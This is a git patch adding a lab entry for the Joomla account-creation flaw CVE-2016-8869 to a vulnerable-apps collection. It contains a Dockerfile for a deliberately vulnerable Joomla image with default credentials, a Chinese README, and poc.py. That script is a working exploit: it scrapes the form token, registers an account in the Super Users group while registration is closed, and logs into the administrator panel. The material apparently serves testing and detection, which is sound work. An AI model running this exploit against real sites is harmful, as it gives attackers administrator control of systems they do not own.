From ef15ac4bda4bfe1be9ab8a947adaa3374d2275b6 Mon Sep 17 00:00:00 2001
From: Medicean <Medici.Yan@Gmail.com>
Date: Mon, 31 Oct 2016 00:58:50 +0800
Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0=20Joomla=E6=9C=AA=E6=8E=88?=
 =?UTF-8?q?=E6=9D=83=E5=88=9B=E5=BB=BA=E7=89=B9=E6=9D=83=E7=94=A8=E6=88=B7?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E(CVE-2016-8869)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 README.md             |  1 +
 j/README.md           |  1 +
 j/joomla/1/Dockerfile |  7 ++++
 j/joomla/1/README.md  | 65 +++++++++++++++++++++++++++++++++
 j/joomla/1/poc.py     | 83 +++++++++++++++++++++++++++++++++++++++++++
 j/joomla/README.md    |  3 ++
 6 files changed, 160 insertions(+)
 create mode 100644 j/joomla/1/Dockerfile
 create mode 100644 j/joomla/1/README.md
 create mode 100644 j/joomla/1/poc.py
 create mode 100644 j/joomla/README.md

diff --git a/README.md b/README.md
index 72a29bf..9aeb987 100644
--- a/README.md
+++ b/README.md
@@ -79,6 +79,7 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
 ### [J](./j/)<div id="j"></div>
 
 * [Jenkins](./j/jenkins/)
+* [Joomla!](./j/joomla/)
 
 ### [O](./o/)<div id="o"></div>
 
diff --git a/j/README.md b/j/README.md
index ece05a8..d6242b6 100644
--- a/j/README.md
+++ b/j/README.md
@@ -1,3 +1,4 @@
 # J
 
 * [Jenkins](./jenkins/)
+* [Joomla!](./joomla/)
diff --git a/j/joomla/1/Dockerfile b/j/joomla/1/Dockerfile
new file mode 100644
index 0000000..daf37e3
--- /dev/null
+++ b/j/joomla/1/Dockerfile
@@ -0,0 +1,7 @@
+FROM medicean/vulapps:base_joomla_3.5
+
+RUN /etc/init.d/mysql restart \
+    && mysql -e "use joomla;update kmxhf_extensions set params=replace(params, 0x227573657261637469766174696f6e223a223222, 0x227573657261637469766174696f6e223a223022);update kmxhf_extensions set params=replace(params, 0x227573657261637469766174696f6e223a223122, 0x227573657261637469766174696f6e223a223022);" -uroot -proot
+
+EXPOSE 80
+CMD ["/start.sh"]
diff --git a/j/joomla/1/README.md b/j/joomla/1/README.md
new file mode 100644
index 0000000..29b27c4
--- /dev/null
+++ b/j/joomla/1/README.md
@@ -0,0 +1,65 @@
+Joomla未授权创建特权用户漏洞(CVE-2016-8869)
+---
+
+### 漏洞信息
+
+Joomla 3.4.4到3.6.3的版本中，攻击者可以在网站关闭注册的情况下注册用户。
+
+详细参考：[Joomla 3.4.4 - 3.6.3 未授权创建用户漏洞](https://www.seebug.org/vuldb/ssvid-92496)
+
+### 镜像信息
+
+类型 | 用户名 | 密码
+:-:|:-:|:-:
+Mysql | root | root
+/administrator/ | admin | admin123
+
+
+### 获取环境:
+
+1. 拉取镜像到本地
+
+ ```
+$ docker pull medicean/vulapps:j_joomla_1
+ ```
+
+2. 启动环境
+
+ ```
+$ docker run -d -p 8000:80 medicean/vulapps:j_joomla_1
+ ```
+ > `-p 8000:80` 前面的 8000 代表物理机的端口，可随意指定。 
+
+### 使用与利用
+
+访问 `http://你的 IP 地址:端口号/`
+
+### PoC 使用
+
+> 本例中使用 [Joomla未授权创建特权用户漏洞(CVE-2016-8869)检测 PoC](http://www.bugscan.net/source/plugin/4669/template/)
+
+
+1. 下载并安装 `BugScan SDK`
+
+ 详见 [BugScan 插件开发文档 - 环境配置](http://doc.bugscan.net/chapter1/1-1.html)
+
+2. 修改 `poc.py` 中地址为容器地址
+
+ ```
+if __name__ == '__main__':
+    from dummy import *
+    audit(assign(fingerprint.joomla, "http://localhost:8000")[1])
+
+ ```
+
+3. 运行 `poc.py`
+
+ ```
+$ python poc.py
+ ```
+
+### 相关链接
+
+* [Joomla 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation](https://www.exploit-db.com/exploits/40637/)
+* [Joomla 3.4.4 - 3.6.3 未授权创建用户漏洞](https://www.seebug.org/vuldb/ssvid-92496)
+[Joomla 未授权创建特权用户漏洞(CVE-2016-8869)检测 PoC](http://www.bugscan.net/source/plugin/4669/template/)
diff --git a/j/joomla/1/poc.py b/j/joomla/1/poc.py
new file mode 100644
index 0000000..38b8eba
--- /dev/null
+++ b/j/joomla/1/poc.py
@@ -0,0 +1,83 @@
+#!/usr/bin/evn python
+# -*-:coding:utf-8 -*-
+
+import hashlib
+import uuid
+import re
+
+
+def assign(service, arg):
+    if service == fingerprint.joomla:
+        return True, arg
+
+
+def audit(arg):
+    url = arg + "index.php/component/users/?task=user.register"
+    code, head, res, redir_url, log1 = hackhttp.http(url)
+    p = re.compile(r'<input type="hidden" name="([0-9a-f]+)" value="1" />')
+    token = p.findall(res)[0]
+    password = hashlib.md5(str(uuid.uuid1())).hexdigest()
+    payload = """-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[name]"\r
+\r
+{username}\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[username]"\r
+\r
+{username}\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[password1]"\r
+\r
+{password}\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[password2]"\r
+\r
+{password}\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[email1]"\r
+\r
+{email}\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[email2]"\r
+\r
+{email}\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="option"\r
+\r
+com_users\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="user[groups][]"\r
+\r
+7\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="task"\r
+\r
+user.register\r
+-----------------------------11366146071214659784807441306\r
+Content-Disposition: form-data; name="{token}"\r
+\r
+1\r
+-----------------------------11366146071214659784807441306--\r
+""".format(
+        username=password, token=token, password=password,
+        email="%s@vulcheck.com" % (password))
+    head = {
+        'Referer': arg + 'index.php/component/users/?view=registration',
+        'Content-Type': 'multipart/form-data; boundary=---------------------------11366146071214659784807441306'
+    }
+    code, head, res, redir_url, log2 = hackhttp.http(
+        url, data=payload, headers=head)
+
+    login_url = arg + '/administrator/index.php'
+    code, head, res, redir_url, log3 = hackhttp.http(login_url)
+    token = p.findall(res)[0]
+    login_data = "username={username}&passwd={password}&option=com_login&task=login&return=aW5kZXgucGhw&{token}=1".format(
+        username=password, token=token, password=password)
+    code, head, res, redir_url, log4 = hackhttp.http(login_url, data=login_data)
+    code, head, res, redir_url, log5 = hackhttp.http(login_url)
+    if 'System <span class="caret">' in res:
+        security_hole(arg, log=log2)
+
+if __name__ == '__main__':
+    from dummy import *
+    audit(assign(fingerprint.joomla, "http://127.0.0.1:32773/")[1])
diff --git a/j/joomla/README.md b/j/joomla/README.md
new file mode 100644
index 0000000..5406e92
--- /dev/null
+++ b/j/joomla/README.md
@@ -0,0 +1,3 @@
+# Joomla! VulApps
+
+* [Joomla未授权创建特权用户漏洞(CVE-2016-8869)](./1/)